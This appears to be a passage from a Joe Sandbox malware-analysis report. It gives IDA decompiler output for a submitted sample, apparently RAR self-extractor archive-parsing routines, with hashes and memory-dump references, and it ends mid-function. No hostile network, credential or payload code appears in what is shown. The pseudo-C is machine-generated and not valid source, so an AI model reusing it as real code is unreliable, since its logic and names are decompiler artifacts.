Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 4a39c0739cbd042dec16a7845e751e2048b1769a4832d715e96f16561104787a
Instruction ID: 35d2a09e1b8574820a9cde29aea34f6d71a91353952f93cb93b44608e3edd591
Opcode Fuzzy Hash: 4a39c0739cbd042dec16a7845e751e2048b1769a4832d715e96f16561104787a
Instruction Fuzzy Hash: 74C0127205C200BECB011BB4DC09C2BBBF8EBA9712F08C908B0A5D2060CA38C150DB11

Uniqueness

Uniqueness Score: -1.00%

Function 00B61A04 Relevance: 1.8, APIs: 1, Instructions: 312
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00B61A04(intOrPtr* __ecx, void* __edx) {
				void* __esi;
				char _t101;
				signed int _t103;
				intOrPtr _t107;
				signed int _t109;
				signed int _t111;
				signed int _t113;
				signed int _t114;
				void* _t119;
				signed int _t125;
				intOrPtr _t126;
				char _t127;
				char _t137;
				intOrPtr _t142;
				signed int _t143;
				void* _t146;
				signed int _t151;
				signed int _t155;
				void* _t160;
				void* _t162;
				void* _t166;
				intOrPtr* _t167;
				signed int _t181;
				void* _t182;
				signed int _t184;
				char* _t198;
				intOrPtr _t199;
				signed int _t200;
				void* _t210;
				void* _t211;
				intOrPtr _t212;
				void* _t214;
				char* _t215;
				intOrPtr _t216;
				void* _t217;
				void* _t224;
				void* _t226;

				_t210 = __edx;
				E00B7EB78(0xb9265a, _t226);
				_t167 = __ecx;
				_t212 = 7;
				 *((char*)(__ecx + 0x6cd4)) = 0;
				 *((char*)(__ecx + 0x6cdc)) = 0;
				 *0xb93278(__ecx + 0x2210, _t212, _t211, _t217, _t166);
				if( *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0xc))))() != _t212) {
					L23:
					_t101 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t226 - 0xc));
					return _t101;
				}
				_t220 = 0;
				 *((intOrPtr*)(__ecx + 0x6cd8)) = 0;
				_t103 = E00B61DF8(__ecx + 0x2210, _t212);
				if(_t103 == 0) {
					E00B613BA(_t226 - 0x38, 0x200000);
					 *(_t226 - 4) = 0;
					 *0xb93278();
					_t107 =  *((intOrPtr*)( *((intOrPtr*)( *_t167 + 0x14))))(); // executed
					 *((intOrPtr*)(_t226 - 0x18)) = _t107;
					 *0xb93278( *((intOrPtr*)(_t226 - 0x38)),  *((intOrPtr*)(_t226 - 0x34)) + 0xfffffff0);
					_t109 =  *( *_t167 + 0xc)();
					_t181 = _t109;
					_t220 = 0;
					 *(_t226 - 0x14) = _t181;
					__eflags = _t181;
					if(_t181 <= 0) {
						L21:
						__eflags =  *(_t167 + 0x6cd8);
						_t182 = _t226 - 0x38;
						if( *(_t167 + 0x6cd8) != 0) {
							_t38 = _t226 - 4; // executed
							 *_t38 =  *(_t226 - 4) | 0xffffffff;
							__eflags =  *_t38;
							E00B615FB(_t182); // executed
							L26:
							_t111 =  *(_t167 + 0x6cc8);
							_t234 = _t111 - 4;
							if(_t111 != 4) {
								__eflags = _t111 - 3;
								if(_t111 != 3) {
									L32:
									 *((intOrPtr*)(_t167 + 0x2218)) = _t212;
									 *((char*)(_t226 - 0xd)) = 0;
									_t113 = E00B63B2D(_t167, _t210, _t220);
									__eflags = _t113;
									 *((char*)(_t226 - 0xe)) = _t113 != 0;
									__eflags = _t113;
									if(_t113 == 0) {
										L38:
										_t114 =  *((intOrPtr*)(_t226 - 0xd));
										L39:
										_t184 =  *((intOrPtr*)(_t167 + 0x6cdd));
										__eflags = _t184;
										if(_t184 == 0) {
											L41:
											__eflags =  *((char*)(_t167 + 0x6cdc));
											if( *((char*)(_t167 + 0x6cdc)) != 0) {
												L43:
												__eflags = _t184;
												if(__eflags == 0) {
													E00B6138B(__eflags, 0x1b, _t167 + 0x32);
												}
												__eflags =  *((char*)(_t226 + 8));
												if( *((char*)(_t226 + 8)) == 0) {
													goto L23;
												} else {
													L46:
													__eflags =  *((char*)(_t226 - 0xe));
													 *((char*)(_t167 + 0x6cce)) =  *((intOrPtr*)(_t167 + 0x223c));
													if( *((char*)(_t226 - 0xe)) == 0) {
														L69:
														__eflags =  *((char*)(_t167 + 0x6ccd));
														if( *((char*)(_t167 + 0x6ccd)) == 0) {
															L71:
															E00B70602(_t167 + 0x6d12, _t167 + 0x32, 0x800);
															L72:
															_t101 = 1;
															goto L24;
														}
														__eflags =  *((char*)(_t167 + 0x6cd1));
														if( *((char*)(_t167 + 0x6cd1)) == 0) {
															goto L72;
														}
														goto L71;
													}
													__eflags =  *((char*)(_t167 + 0x21f8));
													if( *((char*)(_t167 + 0x21f8)) == 0) {
														L49:
														__eflags =  *((intOrPtr*)(_t167 + 0x10)) - 1;
														if( *((intOrPtr*)(_t167 + 0x10)) == 1) {
															goto L69;
														}
														 *0xb93278();
														_t119 =  *((intOrPtr*)( *((intOrPtr*)( *_t167 + 0x14))))(); // executed
														_t224 = _t119;
														_t214 = _t210;
														 *((intOrPtr*)(_t226 - 0x18)) =  *((intOrPtr*)(_t167 + 0x6cb8));
														 *(_t226 - 0x14) =  *(_t167 + 0x6cbc);
														 *((intOrPtr*)(_t226 - 0x1c)) =  *((intOrPtr*)(_t167 + 0x6cc0));
														 *((intOrPtr*)(_t226 - 0x20)) =  *((intOrPtr*)(_t167 + 0x6cc4));
														 *((intOrPtr*)(_t226 - 0x24)) =  *((intOrPtr*)(_t167 + 0x21f4));
														while(1) {
															_t125 = E00B63B2D(_t167, _t210, _t224);
															__eflags = _t125;
															if(_t125 == 0) {
																break;
															}
															_t126 =  *((intOrPtr*)(_t167 + 0x21f4));
															__eflags = _t126 - 3;
															if(_t126 != 3) {
																__eflags = _t126 - 2;
																if(_t126 == 2) {
																	__eflags =  *((char*)(_t167 + 0x6ccd));
																	if( *((char*)(_t167 + 0x6ccd)) == 0) {
																		L66:
																		_t127 = 0;
																		__eflags = 0;
																		L67:
																		 *((char*)(_t167 + 0x6cd1)) = _t127;
																		L68:
																		 *((intOrPtr*)(_t167 + 0x6cb8)) =  *((intOrPtr*)(_t226 - 0x18));
																		 *(_t167 + 0x6cbc) =  *(_t226 - 0x14);
																		 *((intOrPtr*)(_t167 + 0x6cc0)) =  *((intOrPtr*)(_t226 - 0x1c));
																		 *((intOrPtr*)(_t167 + 0x6cc4)) =  *((intOrPtr*)(_t226 - 0x20));
																		 *((intOrPtr*)(_t167 + 0x21f4)) =  *((intOrPtr*)(_t226 - 0x24));
																		 *0xb93278(_t224, _t214, 0);
																		 *( *( *_t167 + 0x10))();
																		goto L69;
																	}
																	__eflags =  *((char*)(_t167 + 0x3330));
																	if( *((char*)(_t167 + 0x3330)) != 0) {
																		goto L66;
																	}
																	_t127 = 1;
																	goto L67;
																}
																__eflags = _t126 - 5;
																if(_t126 == 5) {
																	goto L68;
																}
																L60:
																E00B61F47(_t167);
																continue;
															}
															__eflags =  *((char*)(_t167 + 0x6ccd));
															if( *((char*)(_t167 + 0x6ccd)) == 0) {
																L56:
																_t137 = 0;
																__eflags = 0;
																L57:
																 *((char*)(_t167 + 0x6cd1)) = _t137;
																goto L60;
															}
															__eflags =  *((char*)(_t167 + 0x5680));
															if( *((char*)(_t167 + 0x5680)) != 0) {
																goto L56;
															}
															_t137 = 1;
															goto L57;
														}
														goto L68;
													}
													__eflags =  *((char*)(_t167 + 0x6cd4));
													if( *((char*)(_t167 + 0x6cd4)) != 0) {
														goto L69;
													}
													goto L49;
												}
											}
											__eflags = _t114;
											if(_t114 != 0) {
												goto L46;
											}
											goto L43;
										}
										__eflags =  *((char*)(_t226 + 8));
										if( *((char*)(_t226 + 8)) == 0) {
											goto L23;
										}
										goto L41;
									}
									__eflags = 0;
									 *((char*)(_t226 - 0xd)) = 0;
									while(1) {
										E00B61F47(_t167);
										_t142 =  *((intOrPtr*)(_t167 + 0x21f4));
										__eflags = _t142 - 1;
										if(_t142 == 1) {
											break;
										}
										__eflags =  *((char*)(_t167 + 0x21f8));
										if( *((char*)(_t167 + 0x21f8)) == 0) {
											L37:
											_t143 = E00B63B2D(_t167, _t210, _t220);
											__eflags = _t143;
											 *((char*)(_t226 - 0xe)) = _t143 != 0;
											__eflags = _t143;
											if(_t143 != 0) {
												continue;
											}
											goto L38;
										}
										__eflags = _t142 - 4;
										if(_t142 == 4) {
											break;
										}
										goto L37;
									}
									_t114 = 1;
									goto L39;
								}
								_t215 = _t167 + 0x2217;
								_t220 =  *( *_t167 + 0xc);
								 *0xb93278(_t215, 1);
								_t146 =  *( *( *_t167 + 0xc))();
								__eflags = _t146 - 1;
								if(_t146 != 1) {
									goto L23;
								}
								__eflags =  *_t215;
								if( *_t215 != 0) {
									goto L23;
								}
								_t212 = 8;
								goto L32;
							}
							E00B6138B(_t234, 0x3c, _t167 + 0x32);
							goto L23;
						}
						E00B615FB(_t182);
						goto L23;
					} else {
						goto L5;
					}
					do {
						L5:
						_t198 =  *((intOrPtr*)(_t226 - 0x38)) + _t220;
						__eflags =  *_t198 - 0x52;
						if( *_t198 != 0x52) {
							goto L16;
						}
						_t151 = E00B61DF8(_t198, _t109 - _t220);
						__eflags = _t151;
						if(_t151 == 0) {
							L15:
							_t109 =  *(_t226 - 0x14);
							goto L16;
						}
						_t199 =  *((intOrPtr*)(_t226 - 0x18));
						 *(_t167 + 0x6cc8) = _t151;
						__eflags = _t151 - 1;
						if(_t151 != 1) {
							L18:
							_t200 = _t199 + _t220;
							 *(_t167 + 0x6cd8) = _t200;
							_t220 =  *( *_t167 + 0x10);
							 *0xb93278(_t200, 0, 0);
							 *( *( *_t167 + 0x10))();
							_t155 =  *(_t167 + 0x6cc8);
							__eflags = _t155 - 2;
							if(_t155 == 2) {
								L20:
								_t220 =  *( *_t167 + 0xc);
								 *0xb93278(_t167 + 0x2210, _t212);
								 *( *( *_t167 + 0xc))();
								goto L21;
							}
							__eflags = _t155 - 3;
							if(_t155 != 3) {
								goto L21;
							}
							goto L20;
						}
						__eflags = _t220;
						if(_t220 <= 0) {
							goto L18;
						}
						__eflags = _t199 - 0x1c;
						if(_t199 >= 0x1c) {
							goto L18;
						}
						__eflags =  *(_t226 - 0x14) - 0x1f;
						if( *(_t226 - 0x14) <= 0x1f) {
							goto L18;
						}
						_t160 =  *((intOrPtr*)(_t226 - 0x38)) - _t199;
						__eflags =  *((char*)(_t160 + 0x1c)) - 0x52;
						if( *((char*)(_t160 + 0x1c)) != 0x52) {
							goto L15;
						}
						__eflags =  *((char*)(_t160 + 0x1d)) - 0x53;
						if( *((char*)(_t160 + 0x1d)) != 0x53) {
							goto L15;
						}
						__eflags =  *((char*)(_t160 + 0x1e)) - 0x46;
						if( *((char*)(_t160 + 0x1e)) != 0x46) {
							goto L15;
						}
						__eflags =  *((char*)(_t160 + 0x1f)) - 0x58;
						if( *((char*)(_t160 + 0x1f)) == 0x58) {
							goto L18;
						}
						goto L15;
						L16:
						_t220 = _t220 + 1;
						__eflags = _t220 - _t109;
					} while (_t220 < _t109);
					goto L21;
				}
				 *(_t167 + 0x6cc8) = _t103;
				if(_t103 == 1) {
					_t216 =  *_t167;
					_t220 =  *(_t216 + 0x14);
					 *0xb93278(0);
					_t162 =  *( *(_t216 + 0x14))();
					asm("sbb edx, 0x0");
					 *0xb93278(_t162 - 7, __edx);
					 *((intOrPtr*)(_t216 + 0x10))();
					_t212 = 7;
				}
				goto L26;
			}

0x00b61a04
0x00b61a09
0x00b61a13
0x00b61a18
0x00b61a23
0x00b61a2f
0x00b61a36
0x00b61a42
0x00b61ba0
0x00b61ba0
0x00b61ba2
0x00b61ba8
0x00b61bb0
0x00b61bb0
0x00b61a4f
0x00b61a52
0x00b61a58
0x00b61a5f
0x00b61aa8
0x00b61aaf
0x00b61ab7
0x00b61abf
0x00b61acd
0x00b61ad3
0x00b61adb
0x00b61ade
0x00b61ae0
0x00b61ae2
0x00b61ae5
0x00b61ae7
0x00b61b8f
0x00b61b8f
0x00b61b96
0x00b61b99
0x00b61bb3
0x00b61bb3
0x00b61bb3
0x00b61bb7
0x00b61bbc
0x00b61bbc
0x00b61bc2
0x00b61bc5
0x00b61bd4
0x00b61bd7
0x00b61c00
0x00b61c02
0x00b61c0a
0x00b61c0d
0x00b61c12
0x00b61c14
0x00b61c18
0x00b61c1a
0x00b61c5a
0x00b61c5a
0x00b61c5d
0x00b61c5d
0x00b61c63
0x00b61c65
0x00b61c71
0x00b61c71
0x00b61c78
0x00b61c7e
0x00b61c7e
0x00b61c80
0x00b61c88
0x00b61c88
0x00b61c8d
0x00b61c91
0x00000000
0x00b61c97
0x00b61c97
0x00b61c97
0x00b61ca1
0x00b61ca7
0x00b61dc1
0x00b61dc1
0x00b61dc8
0x00b61dd3
0x00b61de3
0x00b61de8
0x00b61de8
0x00000000
0x00b61de8
0x00b61dca
0x00b61dd1
0x00000000
0x00000000
0x00000000
0x00b61dd1
0x00b61cad
0x00b61cb4
0x00b61cc3
0x00b61cc3
0x00b61cc7
0x00000000
0x00000000
0x00b61cd4
0x00b61cdc
0x00b61cde
0x00b61ce0
0x00b61ce8
0x00b61cf1
0x00b61cfa
0x00b61d03
0x00b61d0c
0x00b61d54
0x00b61d56
0x00b61d5b
0x00b61d5d
0x00000000
0x00000000
0x00b61d18
0x00b61d1e
0x00b61d21
0x00b61d43
0x00b61d46
0x00b61d61
0x00b61d68
0x00b61d77
0x00b61d77
0x00b61d77
0x00b61d79
0x00b61d79
0x00b61d7f
0x00b61d82
0x00b61d8b
0x00b61d94
0x00b61d9d
0x00b61da6
0x00b61db7
0x00b61dbf
0x00000000
0x00b61dbf
0x00b61d6a
0x00b61d71
0x00000000
0x00000000
0x00b61d73
0x00000000
0x00b61d73
0x00b61d48
0x00b61d4b
0x00000000
0x00000000
0x00b61d4d
0x00b61d4f
0x00000000
0x00b61d4f
0x00b61d23
0x00b61d2a
0x00b61d39
0x00b61d39
0x00b61d39
0x00b61d3b
0x00b61d3b
0x00000000
0x00b61d3b
0x00b61d2c
0x00b61d33
0x00000000
0x00000000
0x00b61d35
0x00000000
0x00b61d35
0x00000000
0x00b61d5f
0x00b61cb6
0x00b61cbd
0x00000000
0x00000000
0x00000000
0x00b61cbd
0x00b61c91
0x00b61c7a
0x00b61c7c
0x00000000
0x00000000
0x00000000
0x00b61c7c
0x00b61c67
0x00b61c6b
0x00000000
0x00000000
0x00000000
0x00b61c6b
0x00b61c1c
0x00b61c1e
0x00b61c21
0x00b61c23
0x00b61c28
0x00b61c2e
0x00b61c31
0x00000000
0x00000000
0x00b61c37
0x00b61c3e
0x00b61c49
0x00b61c4b
0x00b61c50
0x00b61c52
0x00b61c56
0x00b61c58
0x00000000
0x00000000
0x00000000
0x00b61c58
0x00b61c40
0x00b61c43
0x00000000
0x00000000
0x00000000
0x00b61c43
0x00b61d11
0x00000000
0x00b61d11
0x00b61bdb
0x00b61be4
0x00b61be9
0x00b61bf1
0x00b61bf3
0x00b61bf6
0x00000000
0x00000000
0x00b61bf8
0x00b61bfb
0x00000000
0x00000000
0x00b61bff
0x00000000
0x00b61bff
0x00b61bcd
0x00000000
0x00b61bcd
0x00b61b9b
0x00000000
0x00000000
0x00000000
0x00000000
0x00b61aed
0x00b61aed
0x00b61af0
0x00b61af2
0x00b61af5
0x00000000
0x00000000
0x00b61afb
0x00b61b00
0x00b61b02
0x00b61b3e
0x00b61b3e
0x00000000
0x00b61b3e
0x00b61b04
0x00b61b07
0x00b61b0d
0x00b61b10
0x00b61b48
0x00b61b4a
0x00b61b50
0x00b61b56
0x00b61b5c
0x00b61b64
0x00b61b66
0x00b61b6c
0x00b61b6f
0x00b61b76
0x00b61b80
0x00b61b85
0x00b61b8d
0x00000000
0x00b61b8d
0x00b61b71
0x00b61b74
0x00000000
0x00000000
0x00000000
0x00b61b74
0x00b61b12
0x00b61b14
0x00000000
0x00000000
0x00b61b16
0x00b61b19
0x00000000
0x00000000
0x00b61b1b
0x00b61b1f
0x00000000
0x00000000
0x00b61b24
0x00b61b26
0x00b61b2a
0x00000000
0x00000000
0x00b61b2c
0x00b61b30
0x00000000
0x00000000
0x00b61b32
0x00b61b36
0x00000000
0x00000000
0x00b61b38
0x00b61b3c
0x00000000
0x00000000
0x00000000
0x00b61b41
0x00b61b41
0x00b61b42
0x00b61b42
0x00000000
0x00b61b46
0x00b61a61
0x00b61a6a
0x00b61a70
0x00b61a73
0x00b61a78
0x00b61a80
0x00b61a88
0x00b61a8d
0x00b61a95
0x00b61a9a
0x00b61a9a
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00B61A09

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: bb7a85f63cdf4c8a24419df74441ec6eb6754e0814f2f0de12975ef97f4886b5
Instruction ID: a35f507783881b3d5fa3ec5a68cd9da4361c489423d88959edcf285389c68ab0
Opcode Fuzzy Hash: bb7a85f63cdf4c8a24419df74441ec6eb6754e0814f2f0de12975ef97f4886b5
Instruction Fuzzy Hash: 3CC18D30A00254AFEF15CF6CC494BA97BE5EF19310F0C49FAEC569F296DA389944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B63BBA Relevance: 1.7, APIs: 1, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00B63BBA(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t79;
				signed int _t86;
				intOrPtr _t91;
				intOrPtr _t96;
				void* _t124;
				char _t125;
				intOrPtr _t133;
				signed int _t135;
				intOrPtr _t149;
				signed int _t152;
				void* _t155;
				void* _t157;

				E00B7EB78(0xb926da, _t157);
				E00B7EC50(0xe6e0);
				_t155 = __ecx;
				_t160 =  *((char*)(__ecx + 0x6cdc));
				if( *((char*)(__ecx + 0x6cdc)) == 0) {
					__eflags =  *((char*)(__ecx + 0x4608)) - 5;
					if(__eflags > 0) {
						L26:
						E00B6138B(__eflags, 0x1e, _t155 + 0x32);
						goto L27;
					}
					__eflags =  *((intOrPtr*)(__ecx + 0x6cc8)) - 3;
					__eflags =  *((intOrPtr*)(__ecx + 0x4604)) - ((0 |  *((intOrPtr*)(__ecx + 0x6cc8)) != 0x00000003) - 0x00000001 & 0x00000015) + 0x1d;
					if(__eflags > 0) {
						goto L26;
					}
					_t86 =  *(__ecx + 0x5640) |  *(__ecx + 0x5644);
					__eflags = _t86;
					if(_t86 != 0) {
						L7:
						_t124 = _t155 + 0x20f8;
						E00B6CFD4(_t86, _t124);
						_push(_t124);
						E00B72089(_t157 - 0xe6ec, __eflags);
						_t125 = 0;
						_push(0);
						_push( *((intOrPtr*)(_t155 + 0x56dc)));
						 *((intOrPtr*)(_t157 - 4)) = 0;
						E00B73377(0, _t157 - 0xe6ec);
						_t152 =  *(_t157 + 8);
						__eflags =  *(_t157 + 0xc);
						if( *(_t157 + 0xc) != 0) {
							L15:
							__eflags =  *((intOrPtr*)(_t155 + 0x5683)) - _t125;
							if( *((intOrPtr*)(_t155 + 0x5683)) == _t125) {
								L18:
								E00B6AB1A(_t155 + 0x21b8, _t149,  *((intOrPtr*)(_t155 + 0x5658)), 1);
								_t133 =  *((intOrPtr*)(_t155 + 0x5644));
								_t91 =  *((intOrPtr*)(_t155 + 0x5640));
								 *((intOrPtr*)(_t155 + 0x2124)) = _t133;
								 *((intOrPtr*)(_t155 + 0x211c)) = _t133;
								 *((intOrPtr*)(_t155 + 0x2120)) = _t91;
								 *((intOrPtr*)(_t155 + 0x2118)) = _t91;
								 *((char*)(_t155 + 0x2128)) = _t125;
								E00B6D099(_t155 + 0x20f8, _t155,  *(_t157 + 0xc));
								 *((char*)(_t155 + 0x2129)) =  *((intOrPtr*)(_t157 + 0x10));
								 *((char*)(_t155 + 0x214f)) =  *((intOrPtr*)(_t155 + 0x5681));
								 *((intOrPtr*)(_t155 + 0x2138)) = _t155 + 0x45e8;
								 *((intOrPtr*)(_t155 + 0x213c)) = _t125;
								_t96 =  *((intOrPtr*)(_t155 + 0x5648));
								_t135 =  *(_t155 + 0x564c);
								 *((intOrPtr*)(_t157 - 0x9aa4)) = _t96;
								 *(_t157 - 0x9aa0) = _t135;
								 *((char*)(_t157 - 0x9a8c)) = _t125;
								__eflags =  *((intOrPtr*)(_t155 + 0x4608)) - _t125;
								if(__eflags != 0) {
									E00B73020(_t157 - 0xe6ec,  *((intOrPtr*)(_t155 + 0x4604)), _t125);
								} else {
									_push(_t135);
									_push(_t96);
									_push(_t155 + 0x20f8); // executed
									E00B69215(_t125, _t152, __eflags); // executed
								}
								asm("sbb eax, eax");
								__eflags = E00B6AAEA(_t125, _t155 + 0x21b8, _t155 + 0x5658,  ~( *(_t155 + 0x56b2) & 0x000000ff) & _t155 + 0x000056b3);
								if(__eflags != 0) {
									_t125 = 1;
								} else {
									E00B62021(__eflags, 0x1f, _t155 + 0x32, _t155 + 0x4610);
									E00B66D83(0xba1098, 3);
									__eflags = _t152;
									if(_t152 != 0) {
										E00B63EDE(_t152);
									}
								}
								L25:
								E00B72297(_t157 - 0xe6ec, _t152, _t155);
								_t79 = _t125;
								goto L28;
							}
							_t149 =  *((intOrPtr*)(_t155 + 0x21d4));
							__eflags =  *((intOrPtr*)(_t149 + 0x6124)) - _t125;
							if( *((intOrPtr*)(_t149 + 0x6124)) == _t125) {
								goto L25;
							}
							asm("sbb ecx, ecx");
							_t144 =  ~( *(_t155 + 0x5688) & 0x000000ff) & _t155 + 0x00005689;
							__eflags =  ~( *(_t155 + 0x5688) & 0x000000ff) & _t155 + 0x00005689;
							E00B6D051(_t155 + 0x20f8, _t125,  *((intOrPtr*)(_t155 + 0x5684)), _t149 + 0x6024, _t144, _t155 + 0x5699,  *((intOrPtr*)(_t155 + 0x56d4)), _t155 + 0x56b3, _t155 + 0x56aa);
							goto L18;
						}
						__eflags =  *(_t155 + 0x564c);
						if(__eflags < 0) {
							L12:
							__eflags = _t152;
							if(_t152 != 0) {
								E00B620BD(_t152,  *((intOrPtr*)(_t155 + 0x5648)));
								E00B6D0B6(_t155 + 0x20f8,  *_t152,  *((intOrPtr*)(_t155 + 0x5648)));
							} else {
								 *((char*)(_t155 + 0x2129)) = 1;
							}
							goto L15;
						}
						if(__eflags > 0) {
							L11:
							E00B6138B(__eflags, 0x1e, _t155 + 0x32);
							goto L25;
						}
						__eflags =  *((intOrPtr*)(_t155 + 0x5648)) - 0x1000000;
						if(__eflags <= 0) {
							goto L12;
						}
						goto L11;
					}
					__eflags =  *((intOrPtr*)(__ecx + 0x5681)) - _t86;
					if( *((intOrPtr*)(__ecx + 0x5681)) != _t86) {
						goto L7;
					} else {
						_t79 = 1;
						goto L28;
					}
				} else {
					E00B6138B(_t160, 0x1d, __ecx + 0x32);
					E00B66D83(0xba1098, 3);
					L27:
					_t79 = 0;
					L28:
					 *[fs:0x0] =  *((intOrPtr*)(_t157 - 0xc));
					return _t79;
				}
			}

0x00b63bbf
0x00b63bc9
0x00b63bcf
0x00b63bd1
0x00b63bd8
0x00b63bf6
0x00b63bfd
0x00b63e51
0x00b63e57
0x00000000
0x00b63e57
0x00b63c05
0x00b63c16
0x00b63c1c
0x00000000
0x00000000
0x00b63c28
0x00b63c28
0x00b63c2e
0x00b63c3f
0x00b63c40
0x00b63c49
0x00b63c4e
0x00b63c55
0x00b63c5a
0x00b63c62
0x00b63c63
0x00b63c69
0x00b63c6c
0x00b63c71
0x00b63c74
0x00b63c77
0x00b63ccc
0x00b63ccc
0x00b63cd2
0x00b63d2e
0x00b63d3c
0x00b63d41
0x00b63d4a
0x00b63d50
0x00b63d56
0x00b63d63
0x00b63d69
0x00b63d6f
0x00b63d75
0x00b63d7d
0x00b63d89
0x00b63d95
0x00b63d9b
0x00b63da1
0x00b63da7
0x00b63dad
0x00b63db3
0x00b63db9
0x00b63dbf
0x00b63dc5
0x00b63de4
0x00b63dc7
0x00b63dc7
0x00b63dc8
0x00b63dcf
0x00b63dd0
0x00b63dd0
0x00b63dfe
0x00b63e0f
0x00b63e11
0x00b63e3e
0x00b63e13
0x00b63e20
0x00b63e2c
0x00b63e31
0x00b63e33
0x00b63e37
0x00b63e37
0x00b63e33
0x00b63e40
0x00b63e46
0x00b63e4c
0x00000000
0x00b63e4e
0x00b63cd4
0x00b63cda
0x00b63ce0
0x00000000
0x00000000
0x00b63d10
0x00b63d12
0x00b63d12
0x00b63d29
0x00000000
0x00b63d29
0x00b63c79
0x00b63c7f
0x00b63c9f
0x00b63c9f
0x00b63ca1
0x00b63cb4
0x00b63cc7
0x00b63ca3
0x00b63ca3
0x00b63ca3
0x00000000
0x00b63ca1
0x00b63c81
0x00b63c8f
0x00b63c95
0x00000000
0x00b63c95
0x00b63c83
0x00b63c8d
0x00000000
0x00000000
0x00000000
0x00b63c8d
0x00b63c30
0x00b63c36
0x00000000
0x00b63c38
0x00b63c38
0x00000000
0x00b63c38
0x00b63bda
0x00b63be0
0x00b63bec
0x00b63e5c
0x00b63e5c
0x00b63e5e
0x00b63e62
0x00b63e6a
0x00b63e6a

APIs

__EH_prolog.LIBCMT ref: 00B63BBF

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2077058bb4fc44a3505253a14feecbf77bd36014d5fd1002f75c7e6b82886e58
Instruction ID: e0bd763f65ce01aedf6cd327d064d0be7ad91cd17093fdc50785533da94c990e
Opcode Fuzzy Hash: 2077058bb4fc44a3505253a14feecbf77bd36014d5fd1002f75c7e6b82886e58
Instruction Fuzzy Hash: 8571D271500B449EDB35DB74C8919E7B7E9EF14700F4049AEF2AB87242DA367A84DF21

Uniqueness

Uniqueness Score: -1.00%

Function 00B68284 Relevance: 1.6, APIs: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00B68284(intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				char _t48;
				void* _t51;
				intOrPtr _t54;
				void* _t56;
				char _t58;
				signed int _t84;
				intOrPtr _t85;
				void* _t92;
				void* _t93;
				void* _t94;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t99;
				void* _t102;

				_t102 = __eflags;
				_t94 = __edi;
				_t92 = __edx;
				E00B7EB78(0xb92831, _t99);
				E00B7EC50(0x9d64);
				_t97 = __ecx;
				_t1 = _t99 - 0x9d70; // -38256
				_push( *((intOrPtr*)(__ecx + 8)));
				E00B613DC(_t1, __edi, _t102);
				 *((intOrPtr*)(_t99 - 4)) = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + 0x82de)) == 0) {
					_t8 = _t99 - 0x9d70; // -38256
					_t48 = E00B69F42(_t8, __edi, __ecx, __ecx + 0xfe);
					__eflags = _t48;
					if(_t48 != 0) {
						goto L3;
					}
				} else {
					 *((intOrPtr*)(_t99 - 0x9d60)) = 1;
					L3:
					_t9 = _t99 - 0x9d70; // -38256, executed
					_t51 = E00B61A04(_t9, _t92, 1); // executed
					if(_t51 != 0) {
						__eflags =  *((intOrPtr*)(_t99 - 0x3093));
						if( *((intOrPtr*)(_t99 - 0x3093)) == 0) {
							_push(_t94);
							_t95 = 0;
							__eflags =  *((intOrPtr*)(_t99 - 0x30a3));
							if(__eflags != 0) {
								_t12 = _t99 - 0x9d3e; // -38206
								_t13 = _t99 - 0x1010; // -2064
								_t65 = E00B70602(_t13, _t12, 0x800);
								__eflags =  *((intOrPtr*)(_t99 - 0x309e));
								while(1) {
									_t19 = _t99 - 0x1010; // -2064
									E00B6C0C5(_t19, 0x800, (_t65 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
									_t20 = _t99 - 0x2058; // -6232
									E00B66EDB(_t20);
									_push(0);
									_t21 = _t99 - 0x2058; // -6232
